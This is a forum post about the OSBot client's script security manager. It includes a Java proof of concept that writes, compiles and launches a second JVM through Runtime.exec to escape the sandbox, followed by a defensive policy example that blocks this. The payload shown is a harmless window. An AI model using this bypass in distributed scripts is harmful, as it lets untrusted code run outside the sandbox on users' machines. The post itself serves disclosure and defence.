
Security manager discussion


Nbacon


1 hour ago, Malcolm said:

There is no need for anyone to access anything outside of that osbot directory 

I 100% agree that scripts with unknown code should be sandboxed.

1 hour ago, Malcolm said:

you’re not able to execute new runtimes afaik.

So yes, you can make and run code outside of osbot (example below). You can also read files outside of the osbot folder but not write to them (kinda dumb but ok).

Quote

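import java.io.BufferedWriter;
import java.io.File;
import java.io.FileWriter;
import java.io.IOException;

import org.osbot.rs07.script.Script;
import org.osbot.rs07.script.ScriptManifest;

@ScriptManifest(author = "Bacon", name = "MAYBEmalicious", info = "malicious", version = 0.0, logo = "")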
public class Test1 extends Script {

    @Override
    public void onStart() throws InterruptedException {
        try {
            File file = new File(getDirectoryData() + "/Main.java");
            BufferedWriter output = new BufferedWriter(new FileWriter(file));
            output.write(
                    "import javax.swing.*;\n" +
                            "import java.awt.*;\n" +
                            "\n" +
                            "public class Main{\n" +
                            "\n" +
                            "    public static void main(String[] args) {\n" +
                            "\n" +
                            "        JFrame frame = new JFrame(\"FrameDemo\");\n" +
                            "        frame.setMinimumSize(new Dimension(800, 400));\n" +
                            "        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);       \n" +
                            "\n" +
                            "        JLabel myLabel = new JLabel(\"Hello World !!!\", SwingConstants.CENTER);\n" +
                            "        myLabel.setFont(new Font(\"Serif\", Font.BOLD, 22));\n" +
                            "        myLabel.setBackground(Color.blue);\n" +
                            "        myLabel.setOpaque(true);\n" +
                            "        myLabel.setPreferredSize(new Dimension(100, 80));\n" +
                            "\n" +
                            "        frame.getContentPane().add(myLabel, BorderLayout.NORTH);\n" +
                            "        frame.pack();\n" +
                            "\n" +
                            "        frame.setVisible(true);\n" +
                            "    }\n" +
                            "}");

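            output.close();
            Thread.sleep(1000);
            // Compile the generated source with the system javac: a new process outside the client.
            Runtime.getRuntime().exec("javac " + getDirectoryData() + "/Main.java");
            Thread.sleep(1000);

            // Launch the compiled class in a second JVM that the client's security manager does not cover.
            Runtime.getRuntime().exec("java -cp " + getDirectoryData() + " Main");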

        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public int onLoop() throws InterruptedException {
        
        stop();
        return 100000;
    }
}

 

For me it seems like more of an annoyance than a safety measure because it can be "easily*" bypassed.

 

 

PS: congrats on super mod

*Dumb workarounds

  • Like 1
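
One way a client could close the gap the post demonstrates, as an added example that is not from the post or from OSBot: a `java.security.Policy` that grants script classes file access only under their data directory and no `execute` permission, so both `Runtime.exec` calls in the script throw. It assumes every script is defined by one dedicated class loader (`scriptLoader`, a hypothetical name) and a JDK where the Security Manager is still available (it is deprecated since Java 17 and disabled in JDK 24).

```java
import java.io.File;
import java.io.FilePermission;
import java.security.Permission;
import java.security.Permissions;
import java.security.Policy;
import java.security.ProtectionDomain;

// Added example, not OSBot code. Class and parameter names are hypothetical.
public class ScriptPolicy extends Policy {
    private final ClassLoader scriptLoader;   // assumption: the loader that defines untrusted scripts
    private final Permissions scriptPerms = new Permissions();

    public ScriptPolicy(ClassLoader scriptLoader, File dataDir) {
        this.scriptLoader = scriptLoader;
        String dir = dataDir.getAbsolutePath();
        // Read/write/delete on the data directory and everything below it ("-" is recursive).
        // "execute" is deliberately absent, so Runtime.exec() fails in checkExec().
        scriptPerms.add(new FilePermission(dir, "read"));
        scriptPerms.add(new FilePermission(dir + File.separator + "-", "read,write,delete"));
        scriptPerms.setReadOnly();
    }

    @Override
    public boolean implies(ProtectionDomain domain, Permission permission) {
        if (domain.getClassLoader() != scriptLoader) {
            return true;                       // client and library code stays fully trusted
        }
        // Script code gets only the explicit grants: no exec, no files outside the
        // data directory, no RuntimePermission("setSecurityManager") to remove the sandbox.
        return scriptPerms.implies(permission);
    }

    public static void install(ClassLoader scriptLoader, File dataDir) {
        Policy.setPolicy(new ScriptPolicy(scriptLoader, dataDir));
        // The default manager delegates to AccessController, which checks every
        // protection domain on the call stack against the policy above.
        System.setSecurityManager(new SecurityManager());
    }
}
```

`FilePermission` compares paths without resolving symbolic links, so the data directory itself must not contain links that point outside it.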